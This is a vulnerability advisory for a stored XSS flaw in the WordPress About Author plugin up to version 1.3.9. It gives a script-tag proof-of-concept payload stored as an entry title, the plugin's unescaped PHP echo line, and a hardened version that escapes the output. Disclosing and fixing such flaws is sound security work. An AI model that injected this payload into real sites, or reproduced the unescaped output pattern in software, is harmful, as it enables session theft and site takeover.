
Wordpress About Author <= 1.3.9 Authenticated Stored XSS

The WordPress “About Author” plugin, in versions up to and including 1.3.9, is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability. An attacker with a valid account on the WordPress site that can add About Author entries can store a JavaScript payload as the entry title; the plugin later echoes that title into the admin panel without escaping it, so the script runs in the browser of any user who views an affected admin page. Depending on the victim's role this can be used to steal session or other sensitive information, perform actions on the victim's behalf, or take control of the site. Updating the plugin to its latest version as soon as possible is recommended.

Initial submission of the vulnerability

# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
The WordPress About Author plugin, version 1.3.9 or lower, is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using a WordPress user, access < your_target >/wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in the post_title input the following payload: `"><script>alert(1)</script>`
- Save. The stored title is then echoed unescaped into the plugin's hidden shortcode-inserter panel, so the Stored Cross-site scripting (XSS) affects all pages/routes within the WordPress admin panel.

Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

Going to About Author > Add new in the admin panel and saving an entry whose title is "><script>alert(1)</script> is not the defect in itself: WordPress stores the title as given, and XSS is an output problem. Looking at /wp-content/plugins/about-author at lines 335-353, the stored post_title is read back from the database and echoed on line 345 without any escaping, and that unescaped output of user-supplied data is what turns the stored string into a Stored XSS.

```php
<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	// Evaluates as (!$all_posts) == null, i.e. true when at least one entry is published.
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		// Reads every published about_author title straight back from the posts table.
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			// Line 345: the ID and the user-supplied post_title are concatenated into HTML
			// with no esc_attr()/esc_html(), so a stored title is emitted verbatim.
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>
```

The successful exploitation of the vulnerability looks as follows in the HTML output:

```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Note that the div carrying the payload has style="display:none;", so nothing visible hints at the injection, yet the plugin outputs this hidden panel on every page of the WordPress admin panel, which is why the vulnerability is reachable from all admin pages. Keep in mind that display:none only affects layout: the browser still parses "><script>alert(1)</script> and executes it regardless of the style.

How to fix

Update the About Author plugin to the latest available version; versions up to and including 1.3.9 are affected.
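For the analysis above and for anyone maintaining similar code, here is the option loop from line 345 next to a hardened form. This is an added example, not the plugin's own code and not its actual fix (the page does not show how the vendor patched it): it applies WordPress's esc_attr() to the value that lands in an attribute and esc_html() to the value that lands in element text. The function_exists() stand-ins and the sample rows are assumptions so the file runs stand-alone with `php`; under WordPress the real esc_attr()/esc_html() are used instead.

```php
<?php
// Added example: vulnerable vs. hardened <option> output for the About Author
// shortcode selector. Not the plugin's code. Runs stand-alone with `php file.php`.

if (!function_exists('esc_html')) {
    // Stand-ins for WordPress's escaping helpers, used only outside WordPress.
    // The real esc_html()/esc_attr() also apply filters and normalise charsets,
    // but the HTML encoding of < > " ' & is the same.
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Builds one <option> the way the vulnerable plugin does: raw concatenation,
// so whatever was stored as post_title is emitted as markup.
function abt_option_vulnerable($id, $title) {
    $title_var = $title ? $title : '(no title)';
    return "<option value='" . $id . "'>" . $title_var . "</option>";
}

// Hardened form: every value that crosses into HTML is escaped for the
// context it lands in (attribute value -> esc_attr, element text -> esc_html).
// The ID is also cast to int since it can never legitimately be anything else.
function abt_option_hardened($id, $title) {
    $title_var = $title ? $title : '(no title)';
    return "<option value='" . esc_attr((string) (int) $id) . "'>" . esc_html($title_var) . "</option>";
}

// Constructed sample rows standing in for $wpdb->get_results(...): one benign
// title and the advisory's payload stored as a post_title.
$rows = [
    (object) ['ID' => 5749, 'post_title' => 'ads'],
    (object) ['ID' => 5751, 'post_title' => '"><script>alert(1)</script>'],
];

foreach ($rows as $row) {
    echo "vulnerable: " . abt_option_vulnerable($row->ID, $row->post_title) . "\n";
    echo "hardened:   " . abt_option_hardened($row->ID, $row->post_title) . "\n";
}
```

Running the file shows the payload row emitted verbatim by the vulnerable builder and as `&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;` by the hardened one, which the browser renders as text inside the option rather than as a new element. Escaping at the point of output is the right place for this check: the same post_title may be rendered in several contexts, and each one needs the escaping appropriate to where the value lands.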

Public appearances

  • https://plugins.svn.wordpress.org/about-author/trunk/readme.txt

Other references

  • https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-about-author-cross-site-scripting-1-3-9/

This post is licensed under CC BY 4.0 by the author.